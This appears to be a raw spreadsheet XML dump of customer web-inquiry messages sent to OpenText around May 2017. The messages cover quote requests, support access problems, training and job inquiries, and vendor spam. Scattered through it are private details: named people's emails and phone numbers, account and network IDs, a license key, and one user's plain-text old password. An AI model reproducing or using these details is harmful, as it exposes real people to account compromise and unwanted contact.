2017-05-15 08:45:32Z: Info: ProductInfo.GetInstalledVersion: Unable to obtain RightFax version: C:\Program Files (x86)\RightFax\Shared Files\rfwin32.dll..._x000D_
2017-05-15 08:45:32Z: Info: Loading install state at start of work._x000D_
2017-05-15 08:45:32Z: Info: IsUpgrade=False, IsModify=False, IsRemoval=False, IsRepair=False..._x000D_
2017-05-15 08:45:55Z: Info: Work has been completed; install state will be saved._x000D_
2017-05-15 08:45:55Z: Info: Reboot status = NotRequired_x000D_
2017-05-15 08:45:55Z: Info: Exitcode = 0_x000D_
2017-05-15 08:45:55Z: Info: Logging ended. We would like some assistance with this product.  Thank you._x000D_
</t>
  </si>
  <si>
    <t>Hi, my name is Shaukat Lodhia with World Wide Technology a Systems Integrator and Reseller. We are interested in learning more about your product Content Management and Capture (OCR/ICR) product suites. We want to understand S3 and AWS compatibility as well as ability to write to multiple storage targets at the same time. Could you please contact me via email @ shaukat.lodhia@wwt.com or 480-239-4547.</t>
  </si>
  <si>
    <t xml:space="preserve">ATTN: MARKETING_x000D_
RE: DIA CHICAGO 2017_x000D_
_x000D_
_x000D_
Dear Exhibitor,_x000D_
_x000D_
_x000D_
DIA 2017 is coming up, if you already have a quote from another company we could possibly give you a discount, don’t take the first quote that you receive, let us send you a free comparison quote.  We specialize in certain areas from high end, simple or turnkey,  we can deliver with flooring, booth design and labor rolled into one or we can provide our services separately based on your needs.  We pride ourselves on competitive pricing, customer satisfaction, consistency and value. It’s not just a tradeshow and impressions do make a difference. You do have the choice of an EAC (Exhibitor APPOINTED Contractor) not just the general contractor for your booth needs._x000D_
_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Erin Mccormack_x000D_
Account Executive_x000D_
_x000D_
Floor Space, Inc. _x000D_
“Out of this world event flooring”_x000D_
_x000D_
_x000D_
3749 E. 150 SO. ∣ TIPTON,  IN.  46072_x000D_
765-513-4763 Mobile_x000D_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</si>
  <si>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I have a customer trying to get support for application extender and is being told that OpenText cannot help him.  _x000D_
I would like to find the account manager for the below account, and get him introduced to his customer._x000D_
_x000D_
Thibaut Govin - tgovin@naxoo.ch_x000D_
My compagny is naxoo SA(Old name 022 Télégenève), Quai du Seujet 28, 1201 Genève – Switzerland._x000D_
_x000D_
I have contract number only the LAC, because this product was purshaze by another compagny._x000D_
_x000D_
LAC is NRV0H48SB2XFND91GPMG_x000D_
</t>
  </si>
  <si>
    <t>We are working with a Pharmaceuticals client to perform a software selection for content management. The client is a small Pharma start up with about 150 employees with clinical trials and manufacturing outsourced. We are looking for general content management as well as specific solutions for SOPs and Contract Management. We have requirements and are entering the demonstration phase and would like to explore OpenText.</t>
  </si>
  <si>
    <t>I would like to receive a quote about your latest rightfax enterprise version and for a pci express fax card (4 channels) that is compatible with your software.  It's easier to join me by email._x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>We currently have customers that use the OpenText platform to manage their web presence.  We would like to create an integration with the WCM that would bring our SaaS accessibility data into the OpenText platform, to create an easier workflow for our customers._x000D_
_x000D_
I am hoping that you can help point me in the right direction of who I should be contacting and working with..._x000D_
_x000D_
Thanks!_x000D_
-JM</t>
  </si>
  <si>
    <t>Looking to use the Quickscan Pro software.  Can someone contact me to discuss the product._x000D_
Thank you</t>
  </si>
  <si>
    <t>I would like access to support.  Our site ID is 90280.  The company name is PI Financial Corp, formerly Pacific International Securities Inc.</t>
  </si>
  <si>
    <t>I am interested in taking classes for our RightFax and Alchemy products.  Please have someone call me to discuss options.</t>
  </si>
  <si>
    <t>I am interested in your inside sales posting</t>
  </si>
  <si>
    <t>Have about 40 users utilizing the Brava Reader.  Would like to purchase so we don't have to continuously upgrade.  Would like a quote</t>
  </si>
  <si>
    <t>how much is a solution asset management for images</t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon,_x000D_
Baltimore County Government is beginning research on an ECM for our enterprise.  I would like to have a conversation with a representative of OpenText to see if this is a solution that may meet our needs. We will, as a policy at BCG, need to get a “No Obligation” form signed so we can discuss our enterprise needs. _x000D_
I look forward to speaking with a representative of OpenText soon!_x000D_
-	Marc_x000D_
</t>
  </si>
  <si>
    <t>Bonjour, _x000D_
_x000D_
J'ai besoin d'un devis pour l'installation sur 1 poste d'une licence IGC Brava DWG afin de pouvoir lire et surtout imprimer proprement des plans au format AutoCAD._x000D_
_x000D_
Pourriez-vous m'adresser une propale pour 1 poste et une seconde pour une 20taine de postes ?_x000D_
_x000D_
Dans cette attente,_x000D_
_x000D_
Très cordialement,</t>
  </si>
  <si>
    <t>I need a quote on a video DRM package that will protect my licesned content AVOD for mobile web and ott</t>
  </si>
  <si>
    <t>I am trying to grant access to Macy's for some of our items and they are not able to see them.  Can someone please advise what I need to do differently for them to have access.  I called last week and left my name with someone but did not receive a call back.</t>
  </si>
  <si>
    <t>Our Trading Partner Nexcom (Navy) uses you for transmission of EDI data that is then sent to our EDI provider. Is it possible to download this information direct from you as CSV? Then upload the corresponding Invoices and ASNS.  Thank you</t>
  </si>
  <si>
    <t>Good Day! I just want to inquire if your company is open for Internship for Computer Engineering Students? Thank you! :)</t>
  </si>
  <si>
    <t>Would like to see a demo of bpm, our corporate company is possibly looking to utilize this technology and they asked me to take a look at it.  The best way to contact me is through email._x000D_
_x000D_
Thank you,_x000D_
Bryan Donaldson</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to schedule a call to get some more details about OpenText, and also to discuss Ergon's needs. We are in the hunt for a Text Archiving Application.   </t>
  </si>
  <si>
    <t>We are still running an XP based machine with Faxpress and for the most part it covers our needs.  Do you offer any small office fax appliance with upgraded OS and Faxpress software?  We are executing the command line SUBMITFAX within our programs and would need some sort of command line utility._x000D_
_x000D_
Thanks_x000D_
Dave Johnson</t>
  </si>
  <si>
    <t xml:space="preserve">Unable to open a ticket through the website._x000D_
I need to run reports on the total number of incoming faxes for the following numbers:_x000D_
_x000D_
863-665-8097_x000D_
863-577-1160_x000D_
863-688-4919_x000D_
_x000D_
Can someone please tell me how to access those statistics?_x000D_
</t>
  </si>
  <si>
    <t>A Business Process Management - Sales opportunity for a 200 user insurance company._x000D_
I am familiar with the old Metastorm BPM - which you now own and with LiquidOffice which you now also own.  We have clients who use both systems. My client is looking for an enterprise class solution which would be hosted on their platform ONLY - no  icloud solution please. The client has some 6 jurisdictions around the world but the hardware is based in Guernsey Channel Islands._x000D_
Thank you_x000D_
David</t>
  </si>
  <si>
    <t>Looking for job opening in Human Resources Department.</t>
  </si>
  <si>
    <t xml:space="preserve">We'd like to learn more information about your ECM product. We are a financial institution and would like to see if your product fits our needs._x000D_
_x000D_
Thanks,_x000D_
Katie </t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
je suis à la recherche d'une prestation pour extraire l'ensemble de nos documents et une sélection de données (dates, droits d'accès, ...) situées sur notre instance Documentum 6.5._x000D_
_x000D_
Réalisez-vous ce type de prestation ? Ou pouvez-vous me conseiller un prestataire privilégié vers lequel me tourner ?_x000D_
_x000D_
Merci par avance de votre aide,_x000D_
_x000D_
Olivier Cherrier</t>
  </si>
  <si>
    <t>Our company have purchased OpenText via SAP. Is there a way to register to access the OpenText Knowledge center as a SAP user?</t>
  </si>
  <si>
    <t>Please provide a list of re-sellers who can provide competitive quotes on AppXtender.</t>
  </si>
  <si>
    <t>I've been using the free DWG Viewer for the past few years. On the latest license renewal, you need windows 10 or a patch to use the viewer.  When I try to install patch, I get a message that the patch will not work on my computer. Is there a work around?_x000D_
Thanks</t>
  </si>
  <si>
    <t>Hello, my company is looking into a new EDMS system and you were recommended.  I watched some of the videos provided on the site and am interested in learning more.  Is there someone I that I may speak to?  We have a list of a few initial requirements but from your videos it seems like these all may be met. _x000D_
Thank you,_x000D_
Katy Beth Christiana_x000D_
Manager, Global Compliance_x000D_
Office:  267.942.3586 _x000D_
katybeth.christiana@telerx.com_x000D_
Telerx | 600 Lasley Avenue | Wilkes-Barre, PA, 18706 | www.telerx.com</t>
  </si>
  <si>
    <t>Hi,_x000D_
we are currently using one license for Team Developer in our company. Now there is me, the second developer who needs the Team Developer IDE. How much does this cost? And do we have the possibiliy to use the new license for Team Developer 3.1?_x000D_
_x000D_
Thank you in regards,_x000D_
Marco Horak</t>
  </si>
  <si>
    <t>Como adquirir o free dwg brava</t>
  </si>
  <si>
    <t>Good morning.  I need access to Stage Stores vendor portal.  We analyze their payments and deductions.  I used to have access to_x000D_
the website, but it has changed.   Please contact me ASAP as I have several checks to analyze.  Thank you</t>
  </si>
  <si>
    <t>Wanted to know online certification courses available for Indian geography, and their fee.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I'am trying to download (Team Developer 7.0). But I can't get access to the resouces through my accont on OpenText (site). CustomerId: 158272, Account: anders.bogghed@lm.se.      _x000D_
_x000D_
Best regards, Anders Bogghed</t>
  </si>
  <si>
    <t>We would like a quote on Document Management licensing for 350 users.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear All ,_x000D_
_x000D_
In line with internal restructuring plan, and on an application made to the High Court and later to National Company Law Tribunal, Hyderabad (“NCLT”), for amalgamation of UnitedHealth Group Information Services Pvt. Ltd. (“ UHGIS”) with Optum Global Solutions ( India) Private Limited (“OGS”), the NCLT has approved the given scheme of amalgamation vide its order dated March 20, 2017._x000D_
_x000D_
Consequently, after receiving the given approval, all the rights and obligations of UHGIS shall stand transferred to and vested in OGS with effect from March 24,2017. OGS shall assume all obligations and liabilities of any current transaction (including compliance with and performance of the terms and conditions of all agreements entered into by UHGIS)._x000D_
_x000D_
Therefore, in view of the aforesaid, effective March 24, 2017, all of UHGIS’s existing and future rights and obligations under the said Agreement shall be transferred to OGS and accordingly, OGS shall then be party to and bound by the terms of the said Agreement (such terms to remain unchanged upon the transfer of Agreement)._x000D_
_x000D_
You are requested to share the formalities or pre requisites that are to be carried out (if any )for the licenses previously procured by UHGIS in India and the eventual transfer of such licenses now to be transferred in the name of Optum Global Solutions ( India) Private Limited . _x000D_
</t>
  </si>
  <si>
    <t>i m job seeker is there any openings in your company plz inform me for applying the job</t>
  </si>
  <si>
    <t>i m job seeker is there any openings in your company _x000D_
plz inform me for the freshers .</t>
  </si>
  <si>
    <t>I've tried a couple of times to download the "The Forrester Wave™: Digital Asset Management For Customer Experience, Q3 2016" report. I'm told that I will receive an email but I never get that email. My email address is steve.creed@mbie.govt.nz</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
Who is the Disti in Kuwait ?_x000D_
Need to Contact him immediately._x000D_
_x000D_
Thanks._x000D_
Mohammed Blushi_x000D_
</t>
  </si>
  <si>
    <t>Software Technology inquiry</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
I am interested in getting certified with Opentext. I work in support role and a Teamsite admin. Please could you let me know what are recommended certificiation paths._x000D_
Regards, _x000D_
_x000D_
Suthashini </t>
  </si>
  <si>
    <t xml:space="preserve">Looking for site where_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Cannot find Exstream Community Site where users ask questions about Exstream. Please send link. Thank You. _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello - we use your software at Seqirus, and in light of the major cyber incident that has affected the UK NHS, can you confirm your solution is patched and protected._x000D_
_x000D_
Many thanks_x000D_
Charles Lowe_x000D_
Director, Enterprise Applications_x000D_
Charles.lowe@seqirus.com	</t>
  </si>
  <si>
    <t>Boa noite,_x000D_
Gostaria de contato para entender os modelos de treinamento para os produtos abaixo:_x000D_
•	Vignette Portal – versão 8.1_x000D_
•	Vignette Content Management – versão 8.0 – SP2_x000D_
_x000D_
Atenciosamente,_x000D_
José Eduardo Paolini</t>
  </si>
  <si>
    <t>Hello, _x000D_
We are trying to obtain direct pricing for the City of Los Angeles Office of Finance Documentum Partner Support Renewal 1YR Start Date: 06/18/2017 End Date: 06/17/2018. Could you please provide us with a quote?_x000D_
Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Need help configuring SSO for KonicabEST Connector.  This is for a demo install at Fort Wayne Schools.  </t>
  </si>
  <si>
    <t>Hello, I´ve been trying to get the Free Brava Reader but the download link never arrives to my email. I have tried with a different email and still does not work. Wondering if the error is on your website. Thank you.</t>
  </si>
  <si>
    <t>We will be distributing an RFI for the procurement of records management consulting services within the next few weeks. We would like to include OpenText in the pool of suppliers. Please provide a contact for receipt of the RFI documentation. Thank you!</t>
  </si>
  <si>
    <t>Would like more information on purchase of RightFax and associated software fax solutions.</t>
  </si>
  <si>
    <t xml:space="preserve">Can you direct to where I may find Section 508 Requirements for your xECM Opentext Software? </t>
  </si>
  <si>
    <t xml:space="preserve">DST Systems, Inc. (DST) has acquired Boston Financial Data Services, Inc. (‘BFDS’).  As a result of this transaction, we wanted to make you aware of some changes to the accounts payable process and alert you to actions required on your part to ensure uninterrupted payment of invoices.  _x000D_
Action Required:_x000D_
•	Please submit a copy of IRS Form W-9 or applicable W-8 for non-US suppliers to DST’s Global Procurement team via email at GPP2P@dstsystems.com.   _x000D_
_x000D_
•	We have an eSupplier invoicing program through DST’s PeopleSoft system using this link:  https://esupplier.dstsystems.com. Once we receive the W9 from your company, we will provide specific details on how to register and submit your invoices thru our eSupplier portal. _x000D_
_x000D_
All invoices will be handled through DST Systems, Inc. To ensure a smooth transition, please complete the requested actions at your earliest convenience.     _x000D_
_x000D_
Additional supplier due diligence may be required as DST completes the Supplier set up process.  We will contact you if further information or action is required.    If you have any questions or require assistance completing the requested actions, please feel free to contact Brandi Pleasant, brpleasant@dstsystems.com, 816.843.6719_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Ronda Freeman_x000D_
Global Procurement Director_x000D_
_x000D_
DST Systems, Inc. _x000D_
</t>
  </si>
  <si>
    <t>I am just being sent-up as a new vendor at TRU and would like fee information from you on being our third party provider. We would be running this manually from our end. You receive the PO, we enter it manually in our system. We generate the invoice, transmit to you and you submit to TRU. Our initial expectations are no more than 5 transactions/month and many months with no transactions. I look forward to your quote for set-up &amp; testing along with monthly or per transaction charges.</t>
  </si>
  <si>
    <t>Need to purchase some products. _x000D_
Product# S-DMOOO934101E e-DOCS DM Standard Named User Client Qty 250 each Product# S-DMOOO955101E-e-DOCS DM Imaging Imaging Client Qty. 45 each Product# S-KMOOO034101E eDOCS KM Client Qty. 10 each Product # H-OTCBUSR Loyal to the Core Program Qty. 1 each _x000D_
Please let me know if you can help me.  Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">My account_x000D_
https://catalogue.gxs.com/QRSGUI/jsf/login/login.jspx_x000D_
EXCLUSIVE BRANDS INTL SA (125073017656)_x000D_
_x000D_
NetworkID:  EX76897_x000D_
User ID:       EX76897D_x000D_
_x000D_
----_x000D_
Hi, if possible for this account, add some feature as, show last search or last download upc. For example my boss receive monthly invoice with upc download or search, but we dont know what brands we downloaded, or get via advanced search copy and paste upc code value._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there,_x000D_
_x000D_
My name is Jessica and I work at Genesys. I am contacting you to see if your company would be interested in sponsoring our Toronto Tech Summit event on Friday May 26, 2017 at the MaRS Discovery District. This will be a day tech event from 12-5PM with an after party from 5-8PM._x000D_
_x000D_
This will be our 5th event, and we are expecting 350+ attendees that are entrepreneurs, developers, web developers, investors, start-ups, professors, tech bloggers, students, executives, tech enthusiasts, and more._x000D_
_x000D_
In the past, we’ve had speakers from Sony PlayStation, GoPro, TD, Facebook, Airbnb, KiK Messenger, AutoDesk, AMD, Telus, rangle.io, eBay, and more._x000D_
_x000D_
Here is our event page for more details: http://www.torontotechsummit.com/ _x000D_
Here is our Sponsorship Package: https://drive.google.com/file/d/0B77cqLswZ_e1UU95MEpKbHR5amc/view _x000D_
_x000D_
Please review it and let me know if you are interested in being a part of our event! I look forward to hearing from you._x000D_
_x000D_
Regards,_x000D_
Jessica Dam_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon_x000D_
_x000D_
I hope you are keeping well,_x000D_
_x000D_
Can this email please be forwarded to the personal that looks after the accommodation, training, corporate clients &amp; events _x000D_
I am the Sales and Marketing Manager of Kinsale Hotels (Actons Hotel &amp; the Trident Hotel) and I would love to speak to you regarding corporate rates, Christmas and offers we would have available to you, your colleagues and your clients. I would also love to show you images or give you a site visit of the Trident Hotel &amp; Actons Hotel as it has had a €1.5million refurbishment completed recently. _x000D_
Would you be available for a chat on Thursday morning, the 25th of May? I would be happy to visit you in your cork office _x000D_
_x000D_
Looking forward to hearing from you_x000D_
Orlaith Giltinan_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Hope you are doing great._x000D_
_x000D_
A growing business has a hidden secret for growth which keep updating the client base. Our services will be very handy if you choose to avail our service._x000D_
_x000D_
We are a database organization providing opt-in B2B contacts serving all the industries and sectors. We can provide you complete contacts details of various key decision makers including CEO/CFO, President, VP, Technology Director, Electronic and Electrical equipment assemblers, Network Engineer, CRM user, IT resellers and many more which might be interested in using your services._x000D_
_x000D_
These job titles are from various sectors e.g Information Technology, OEMs, Software Developers, BPO's, Medical Institutes, Educational Institutes, Government Offices and many more._x000D_
_x000D_
Kindly let me know your target criteria so that I can provide you counts available:_x000D_
_x000D_
Target Industry:_x000D_
Target Job Titles:_x000D_
Target Geography:_x000D_
_x000D_
Look forward to your response._x000D_
_x000D_
Regards,_x000D_
Edward Martin</t>
  </si>
  <si>
    <t>Hi,_x000D_
 _x000D_
Would you be interested in discussing about the updated database for Telecommunications industry._x000D_
 _x000D_
We have complete contact details of CIO, CTO, CEO, Corporate Buyers, Data Centre Managers, Marketing Departments Heads, E-marketing specialists, IT Managers and Directors, Brand Managers, Engineers, ERP Analysts, CRM consultants, IP Solution Providers, App Developers, Merchandisers, Retailers from industries mentioned below who might be interested in your product and services._x000D_
 _x000D_
Industries: Education, Medical, Cable and Satellite, Internet Service Providers, Website Hosting and Internet-related Services, Telephony and Wireless, Consumer technology, Data Centre, Digital Marketing, Enterprise Hardware and software, Network Security, Virtual Reality, Mobility, GSM Exchange, Transport and Logistics and many more._x000D_
 _x000D_
Kindly let me know your target criteria so that i can send you counts, cost and samples for your reference._x000D_
 _x000D_
Target Industry:_x000D_
Target job title:_x000D_
Target Geography:_x000D_
 _x000D_
Thank you and look forward for your response._x000D_
 _x000D_
Regards,_x000D_
David Smith_x000D_
Marketing Manager</t>
  </si>
  <si>
    <t>Good day. I am currently gathering information on content management systems and editors. I am having a hard time distinguishing the solutions that you offer that would provide the information I am looking for. In summary, we produce content for publication to PDF, WebHelp, HTML etc. The content is in XML format, and we require collaboration across multiple office locations (cloud/SaaS storage and access). Thank you. (please not, I am gathering information and I am in no position to negotiate contracts etc. I am gathering information for evaluation by the committee that does make the decisions).</t>
  </si>
  <si>
    <t>Get access to DWG drawings.</t>
  </si>
  <si>
    <t>Somos clientes de Documentum desde hace unos 5 años. Nos encontramos evaluando el cambio de DMS por uno enfocado al sector Legal. Tenemos previsto considerar para este proceso iManage y eDocs. Quisieramos contactarnos con ustedes con la finalidad podamos explorar la posibilidad de migrar Documentum a eDocs mediante algun upgrade._x000D_
De preferencia, solicitaria se comuniquen conmigo en Español._x000D_
_x000D_
Gracias</t>
  </si>
  <si>
    <t>Hello, I currently own one copy of Quickscan Pro 4.71.0 and I would be interested in purchasing an additional copy for our secondary location. I have been in contact with EMC and I was directed to contact the Open Text support.</t>
  </si>
  <si>
    <t>Hi. Do you have a SOAP PHP library or PHP examples?</t>
  </si>
  <si>
    <t>I am new with Swagelok and Open Text.  I was wondering if there were any  classes/webinars I can take to give me the basics on Open Text.  Thanks!</t>
  </si>
  <si>
    <t>Existe representante no Brasil?</t>
  </si>
  <si>
    <t>Dear Sir/Madame!_x000D_
We are searching for someone who will help us to organize an instruction about the Streamserve Persuasion SP5 5.6.1 GA application which is widely and mainly used at Eon. The scope of the tender is to create a comprehensive instruction package about the mentioned application to our copmanys employees._x000D_
The tuitions place will be the part of the arrangement. We would like to get offers about the following tuition places: Budapest, on-line, offerer prefered._x000D_
Tuition topics:_x000D_
At the tuition the offerer has to talk about the actually used technologies and preferable Streamserve technologies at the future (or about the technologies what we should use)._x000D_
•	Streamserve development process_x000D_
o	XMLin _x000D_
o	PPQ Functionality_x000D_
o	PageOut_x000D_
	Printing process and Stickers (like OMR, Labels, Enveloping etc…)_x000D_
Optional topics:_x000D_
•	Streamserve administration and development environment_x000D_
o	In Windows 7_x000D_
o	Installation_x000D_
o	Database configuration (Oracle Express or Microsoft SQL Express)_x000D_
•	Introduction about technologies what we are not use_x000D_
o	StreamStudio_x000D_
Kind regards,_x000D_
Edit Csordas</t>
  </si>
  <si>
    <t>The JSE is Information Services division is embarking on establishing information governance together with data management.We are looking at leaders in the industry to provide us with services in support of Data management and info Governance.</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking get certified in Documentum xCP(5-8620 – OpenText Certified Documentum xCP Developer Exam). After the OpenText acquisition, the exam is not listed in PearsonVue Exam center. Kindly let me know which are the recognized exam center in Netherlands where I could give this exam. </t>
  </si>
  <si>
    <t>We will be migrating our current RightFax server 10.0 to version 10.6.  I would like to take some classes on the server installation / integration and setup.  We also use the Arcive module and would like classes for this as well</t>
  </si>
  <si>
    <t>Sujet StreamServe (contractuel)._x000D_
Bonjour,_x000D_
J'étais en contact il y a quelques mois avec Caroline PERRET. Celle-ci n'est plus joignable. Est-ce que la personne qui a repris son poste pourrait me contacter. _x000D_
Cordialement.</t>
  </si>
  <si>
    <t>i am interested in the dwg file brava free to read only drawings. after using it for several months now asks me license I would like to know how to receive or you can download it without license and without expiry. I note that I do not speak english to contact you using translator_x000D_
thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Brauche Beratung zu Ihren Produkten_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Please send me detailed information about Enterprise Content Management and Email solutions . A demo and detailed discussion will be highly appreciated._x000D_
Please contact me directly @ +60196603409 the earliest possible._x000D_
_x000D_
Overview:_x000D_
We receive approx. 70,000 bank transfer remittances per month  and many are sent on the day the payment is made (the day before the bank statement received), So the key requirement is to get these remittances into SAP easily and fast._x000D_
_x000D_
The typical formats are:_x000D_
.pdf .xlsx .xls .html .msg .doc .txt_x000D_
_x000D_
1. A data capture capability that includes –_x000D_
•	E-mail parsing (strings i.e. search for invoice, accounts, and syntactic analysis)_x000D_
•	Read email text to identify allocation information_x000D_
•	Optical Character Recognition (OCR) for e-mail attachment_x000D_
•	Reach email attachments of various file formats and identify allocation information_x000D_
•	File converter for .xls .csv (…) formats for hosting and rationalization of remittances_x000D_
•	Depending on the solution file converting may or may not be required_x000D_
_x000D_
2. An aggregation layer for customer remittances_x000D_
•	Aggregate and consolidate customer remittances in look-up table on SAP directories (the remittances table)_x000D_
_x000D_
3. Auto-matching rules_x000D_
•	There are currently 6 matching rules enabled_x000D_
•	The 7th matching rule look up remittances details in remittance table if the account cannot be found, and matching rules 1-6 have failed_x000D_
_x000D_
4. Automated process to clear un-applied payments on customer accounts to related invoices using remittances table_x000D_
</t>
  </si>
  <si>
    <t>I changed my email address from frb@hypersoftindia.net to frb@kahinbhi.com, and although I have received a mail saying that the account is created, when I try to login to support it asks me to request a confirmation email.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
This Irene from ACL Taiwan._x000D_
Yesterday, I clicked "reset password" and then the system said the new password have been sent to user's email address...but I haven't received the new password..._x000D_
_x000D_
Could you please let me know my new password asap?_x000D_
_x000D_
My:_x000D_
*Network ID: AC75159_x000D_
*User ID: AC75159A_x000D_
*Old password: Richie34477708a_x000D_
_x000D_
Thanks!_x000D_
_x000D_
Best regards,_x000D_
Irene_x000D_
</t>
  </si>
  <si>
    <t>Need to know detail of Open Text solution, and please let know who can contact in China for business</t>
  </si>
  <si>
    <t xml:space="preserve">------------------------------【WEBアプリケーション開発を9年間経験しているエンジニア】　　	_x000D_
	_x000D_
	_x000D_
度々のご連絡にて、大変失礼いたします。 	_x000D_
株式会社キャリアシステムと申します。	_x000D_
	_x000D_
貴社ホームページを拝見し、『主婦』×『即戦力』の	_x000D_
ご提案をさせていただきたくメールいたしました。	_x000D_
	_x000D_
弊社は「キャリア主婦」の活用をメインに時短派遣を	_x000D_
させていただいている会社です。 求められるポジションや	_x000D_
経験に見合った主婦の方を人材派遣でご紹介しております。	_x000D_
◆弊社HP　『派遣deパート』	_x000D_
https://www.parthaken.jp/	_x000D_
	_x000D_
	_x000D_
この度は	_x000D_
 ╋━━━━━━━━━━━━━━━━━━━━━━━━	_x000D_
WEBアプリケーション開発を9年間経験しているエンジニア	_x000D_
 ╋━━━━━━━━━━━━━━━━━━━━━━━━	_x000D_
のご紹介できればと思い	_x000D_
プロフィールをご参考までに添付させていただきます。	_x000D_
ご一読・ご検討いただき、御社のお力になれましたら幸いです。	_x000D_
	_x000D_
	_x000D_
◆テクニカルスキル◆	_x000D_
・OS　Windows、UNIX	_x000D_
・DB　Oracle、MS-SQL、DB2	_x000D_
・言語　Java、scala、VBA、XML、SQL、perl、ruby	_x000D_
・Office　Word、Excel、PowerPoint	_x000D_
	_x000D_
・Java/J2EEを使用したWEBアプリケーション開発	_x000D_
・サブリーダー経験（進捗管理、後輩指導）	_x000D_
	_x000D_
	_x000D_
◆業務実績◆	_x000D_
旧保険金・保全システムのバージョンアップ	_x000D_
光回線加入システム	_x000D_
携帯会社向け顧客管理システム	_x000D_
携帯会社向け支払いサポートサービス	_x000D_
クラウド基盤仮想化サービス	_x000D_
携帯会社向け顧客データ分析システム	_x000D_
電気自動車ナビゲーションシステム	_x000D_
ペット損害保険新基幹システム	_x000D_
銀行向け国債売買システム	_x000D_
コンテンツ連動型広告配信サービス	_x000D_
CMSシステムの保守・追加開発	_x000D_
	_x000D_
	_x000D_
◆希望・条件等	_x000D_
月～金　週3～4日　9：30～18：00もしくは10：00～18：00勤務希望。	_x000D_
【月額請求単価】313,600円　+　交通費実費請求	_x000D_
詳細：3,200円/時間　×　7時間　×　週3.5日	_x000D_
	_x000D_
	_x000D_
他にも『Webデザイナー、ディレクター』などのWeb系人材。	_x000D_
『SE・PG～テスト』などのエンジニア、『営業事務』などの事務系職種など	_x000D_
キャリア主婦に毎月150人登録頂いております。	_x000D_
お困りの職種についてお気軽にご相談ください。	_x000D_
よろしくお願いします。	_x000D_
	_x000D_
	_x000D_
━━━━━━━━━━━━━━━━━━━━━━━━	_x000D_
株式会社キャリアシステム 東京	_x000D_
担当：浅井・佐藤	_x000D_
cs-tokyo@919.jp	_x000D_
フリーコール：0120-505-169	_x000D_
	_x000D_
〒107-0052　東京都港区赤坂2-11-7　ATT新館	_x000D_
TEL：03-5574-7333	_x000D_
「派遣deパート」：https://www.parthaken.jp/	_x000D_
━━━━━━━━━━━━━━━━━━━━━━━━	_x000D_
	_x000D_
＊お手数ですが、配信停止をご希望される方は	_x000D_
・社名	_x000D_
・メールアドレス	_x000D_
を記載いただき【配信停止】と記載いただき	_x000D_
下記アドレスまでご返信いただけますでしょうか	_x000D_
	_x000D_
cs-tokyo@919.jp	_x000D_
	_x000D_
以後、配信しないよういたします。	</t>
  </si>
  <si>
    <t>We will be submitting an RFI in the next 2 weeks for a new ECM platform from the bank and would like to get contact info of who to send to directly for consideration.  _x000D_
_x000D_
Thank you,</t>
  </si>
  <si>
    <t>You guys still own "The Palace" code?</t>
  </si>
  <si>
    <t>A client, Ministry of Business Innovation and Employment, currently runs RightFax 10.5.1.4432. They are moving to a Windows 10 desktop with Office 2016. I understand that the supported version of RightFax for this is 10.6 FP3. Am I correct that this would also require a server-side upgrade?_x000D_
Thanks</t>
  </si>
  <si>
    <t>I'm Requesting Learning Central and My Support Access</t>
  </si>
  <si>
    <t>Capabilities demo request.  Interested in capabilities around digital experience management.</t>
  </si>
  <si>
    <t>Methods of payment for Training Course - Documentum Technical Fundamentals. 3-8010</t>
  </si>
  <si>
    <t>we have a user who would like to purchase your application. the "buy now" link is not working. how can the software be purchased?</t>
  </si>
  <si>
    <t>hi, I am looking to contact buyer of bath towels and kitchen towels ,</t>
  </si>
  <si>
    <t>We would like more information about how rightfax operates and how we can utilize it for our company. We would like to have an inter-correlation between our email and our fax.</t>
  </si>
  <si>
    <t>Looking to include OpenText in our RFP process for Contract Management Solution.  I need a contact along with an email to send you a link to register so that I can invite you to participate in our solicitation.  Please reach out to me no later than May 15, 2017.</t>
  </si>
  <si>
    <t>interested in buying your product, not sure which one to take._x000D_
do you have any specials? can we add on if we buy the cheaper product to upgrade to more expensive product?</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren, _x000D_
_x000D_
besteht die Möglichkeit einen Imbissstellplatz auf Ihren Gelände in Oldenburg zu mieten?_x000D_
_x000D_
Über eine Antwort ürde ich mich freuen und bedanke mich im voraus._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Khan</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to speak to someone in Sales about RightFax as an enterprise FAX solution for my company.  </t>
  </si>
  <si>
    <t>To whom it may concern _x000D_
You say "WE'RE INFORMATION EXPERTS._x000D_
You can be too."_x000D_
_x000D_
I am trying to be an Expert to transform information to knowledge. _x000D_
I would like to have info about your services, if possible. My aim is to see if you have reached further, just out of scientific curiosity._x000D_
_x000D_
Regards_x000D_
Mehmet Karatay_x000D_
Türkiye</t>
  </si>
  <si>
    <t>I'm interested in signing up for the Open Text EasyLink service. Could you please provide more information, including pricing?</t>
  </si>
  <si>
    <t xml:space="preserve">Price checking_x000D_
We are looking to change our document storage.  Currently using paper files or saving to our server.  The discussion is whether to go with Office 365 that we currently have or possible another type of document storage.  </t>
  </si>
  <si>
    <t xml:space="preserve">  Will the new version of Brava Reader work with windows 7? If not do you have a version for sale that will work, or know of another program that will.</t>
  </si>
  <si>
